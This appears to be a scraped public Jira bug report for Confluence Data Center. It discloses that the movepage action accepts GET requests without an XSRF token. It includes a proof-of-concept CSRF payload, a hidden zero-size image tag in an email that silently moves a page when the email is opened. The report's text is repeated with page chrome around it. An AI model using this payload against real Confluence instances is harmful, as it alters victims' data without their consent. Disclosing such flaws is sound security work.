We couldn't load the project sidebar. Refresh the page to try again.
If the problem persists, contact your Jira admin.
IMPORTANT: JAC is a Public system and anyone on the internet will be able to view the data in the created JAC tickets. Please don’t include Customer or Sensitive data in the JAC ticket.
Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-30750

Moving pages around spaces using HTTP get without XSRF token

      Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:

      http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2

      Malicious example of how to exploit this (in an email message):

      <img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">

      (after opening the email, the page has been moved to S2 space)

      scary!!

          Form Name

            Loading...
            IMPORTANT: JAC is a Public system and anyone on the internet will be able to view the data in the created JAC tickets. Please don’t include Customer or Sensitive data in the JAC ticket.
            Uploaded image for project: 'Confluence Data Center'
            1. Confluence Data Center
            2. CONFSERVER-30750

            Moving pages around spaces using HTTP get without XSRF token

                Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:

                http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2

                Malicious example of how to exploit this (in an email message):

                <img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">

                (after opening the email, the page has been moved to S2 space)

                scary!!

                        psaw PatrickA
                        iloire Ivan Loire (Inactive)
                        Affected customers:
                        0 This affects my team
                        Watchers:
                        6 Start watching this issue

                          Created:
                          Updated:
                          Resolved:

                            psaw PatrickA
                            iloire Ivan Loire (Inactive)
                            Affected customers:
                            0 Vote for this issue
                            Watchers:
                            6 Start watching this issue

                              Created:
                              Updated:
                              Resolved: